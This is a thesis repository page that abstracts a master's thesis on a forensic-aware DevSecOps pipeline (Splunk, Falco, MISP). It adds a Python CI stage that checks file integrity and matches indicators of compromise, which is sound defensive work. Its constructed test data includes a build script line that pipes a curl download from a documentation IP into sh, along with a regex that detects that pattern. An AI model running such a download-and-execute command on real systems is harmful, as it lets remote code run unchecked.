
Luigi Papalia
Forensic-Aware DevSecOps Pipeline: Design, Implementation and Execution against a Purposefully Vulnerable Microservice.
Supervisor: Andrea Atzeni. Politecnico di Torino, Master's degree programme in Computer Engineering (Corso di laurea magistrale in Ingegneria Informatica), 2025
PDF (Tesi_di_laurea) - Thesis
Licence: Creative Commons Attribution Non-commercial No Derivatives. Download (2MB)
Abstract:
The main objective of this thesis is the design, implementation, and demonstration of a forensic-aware DevSecOps pipeline that blends proactive DevSecOps practices with reactive forensic analysis capabilities. Existing DevSecOps approaches emphasize early vulnerability detection and automation across the software development lifecycle, but they sometimes neglect the strong forensic capabilities that are critical to successful post-incident investigations and precise threat attribution. Digital forensic analysis, on the other hand, provides powerful investigative tools, but it is applied mostly reactively and often in silos. This work seeks to bridge that gap by making forensic readiness an integral part of the CI/CD pipeline. The pipeline integrates forensic-ready components: Splunk for centralized log collection, Falco for real-time runtime threat detection, and the Malware Information Sharing Platform (MISP) for threat intelligence correlation and Indicator of Compromise (IoC) identification. These tools are integrated systematically to augment static and dynamic vulnerability detection and so mitigate well-known shortcomings of traditional security practices, particularly against advanced insider threats and highly complex supply chain attacks. The experimental part of the thesis deploys not only the proposed pipeline but also an intentionally vulnerable microservice. This proof-of-concept application exhibits realistic attack patterns such as hidden code injection and backdoor insertion, making it possible to exercise both a traditional and a forensic-aware pipeline against the same target.
This dual testing approach showed that automatic detection of emerging and increasingly prevalent attack vectors, including ones resembling the XZ Utils backdoor, is both possible and beneficial, and it demonstrated how traditional DevSecOps approaches often fail for lack of contextual forensic information and traceability. Key benefits of the forensic-aware approach include improved vulnerability identification through IoC detection applied directly to the source code, automated integrity checks on runtime artifacts and CI/CD operations using mechanisms such as checksum validation and log correlation, and shorter incident response times. While forensic analysis can never be entirely proactive, given its inherently reactive nature, its strategic integration within the pipeline significantly narrows the gap between detection and response. This approach aligns with the industry-adopted "shift-left" philosophy and extends its reach beyond early-stage prevention into real-time contextual detection and forensic preparedness, yielding a development environment that is markedly more resilient and more capable of supporting investigation. In conclusion, the forensic-aware pipeline does not claim to eliminate all threats preemptively. Instead, it redefines the pipeline's role by enabling it to capture forensic signals in real time and use them to inform both detection and attribution. By coupling proactive security measures with systematic forensic instrumentation, the pipeline becomes a flexible and resilient security architecture, one capable of confronting modern attack scenarios with analytical rigor and operational readiness.
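The abstract names two mechanisms concretely: IoC detection applied directly to the source code, and checksum validation of artifacts with the findings forwarded to a log collector. The following Python is an added example, not code from the thesis or from Splunk, Falco or MISP, sketching a single CI stage that does both against a constructed in-memory checkout and emits newline-delimited JSON events a log forwarder could ingest. The indicator format is a simplified MISP-like {type, value} shape, the event field names are this example's own choice, and every file content, manifest entry and indicator below is constructed for illustration (203.0.113.0/24 is a documentation address range, not real threat data).

```python
import hashlib
import json
import re

# Constructed data for the example: a tiny in-memory checkout, the manifest a
# trusted build recorded earlier, and indicators in a simplified MISP-like
# {"type", "value"} shape. None of this is real threat intelligence.
CLEAN_UTIL = b"def add(a, b):\n    return a + b\n"
BAD_BLOB = b"\x7fELF constructed placeholder for a known-bad vendored binary\n"

SOURCE_TREE = {
    "src/app.py": b"def handler():\n    return 'ok'\n",
    "src/util.py": b"def add(a, b):\n    return a + b  # silently altered\n",
    "build/setup.sh": b"#!/bin/sh\ncurl -s http://203.0.113.10/x | sh\n",
    "vendor/blob.bin": BAD_BLOB,
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Manifest as recorded at a trusted point in time; util.py's entry was taken
# before the file was altered, so the stage should flag it.
MANIFEST = {
    "src/app.py": sha256_hex(SOURCE_TREE["src/app.py"]),
    "src/util.py": sha256_hex(CLEAN_UTIL),
    "build/setup.sh": sha256_hex(SOURCE_TREE["build/setup.sh"]),
    "vendor/blob.bin": sha256_hex(BAD_BLOB),
}

INDICATORS = [
    {"type": "ip-dst", "value": "203.0.113.10"},
    {"type": "regex", "value": r"curl\s+[^\n|]*\|\s*sh"},  # download-and-execute
    {"type": "sha256", "value": sha256_hex(BAD_BLOB)},
]


def check_integrity(tree, manifest):
    """Compare every file against the manifest and report drift in both directions."""
    events = []
    for path, expected in manifest.items():
        if path not in tree:
            events.append({"event": "missing_file", "severity": "medium", "path": path})
        elif sha256_hex(tree[path]) != expected:
            events.append({"event": "integrity_mismatch", "severity": "high",
                           "path": path, "expected": expected,
                           "actual": sha256_hex(tree[path])})
    for path in tree:
        if path not in manifest:
            events.append({"event": "unlisted_file", "severity": "medium", "path": path})
    return events


def match_iocs(tree, indicators):
    """Apply hash, regex and plain-substring indicators to each file in the tree."""
    events = []
    for path, data in tree.items():
        text = data.decode("utf-8", errors="replace")
        digest = sha256_hex(data)
        for ioc in indicators:
            kind, value = ioc["type"], ioc["value"]
            if kind == "sha256":
                hit = digest == value
            elif kind == "regex":
                hit = re.search(value, text) is not None
            else:  # ip-dst, domain, url and similar: substring match
                hit = value in text
            if hit:
                events.append({"event": "ioc_match", "severity": "high",
                               "path": path, "ioc_type": kind, "ioc_value": value})
    return events


def run_stage(tree, manifest, indicators):
    return check_integrity(tree, manifest) + match_iocs(tree, indicators)


def stage_passes(events):
    """Gate for the pipeline: any high-severity finding fails the stage."""
    return not any(e["severity"] == "high" for e in events)


def to_log_lines(events, run_id):
    """Newline-delimited JSON in the shape a log forwarder can ingest as-is.
    The field names are this example's choice, not a Splunk or Falco schema."""
    return "\n".join(
        json.dumps({"run_id": run_id, "source": "ci-forensic-stage", **e}, sort_keys=True)
        for e in events
    )


if __name__ == "__main__":
    found = run_stage(SOURCE_TREE, MANIFEST, INDICATORS)
    print(to_log_lines(found, "run-0001"))
    print("stage passes:", stage_passes(found))
```

Run against the constructed tree, the stage reports one integrity mismatch (src/util.py) and three IoC hits (the address and the download-and-execute pattern in build/setup.sh, the hash of vendor/blob.bin), fails the gate, and writes every finding with the run identifier so that a later investigation can correlate the pipeline run with runtime events from the same artifact.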
Supervisors: Andrea Atzeni
Academic year: 2024/25
Publication type: Electronic
Number of pages: 122
Subjects:
Degree programme: Master's degree programme in Computer Engineering (Corso di laurea magistrale in Ingegneria Informatica)
Degree class: New system > Master's degree > LM-32 - Computer Engineering
Partner companies: NOT SPECIFIED
URI: http://webthesis.biblio.polito.it/id/eprint/36471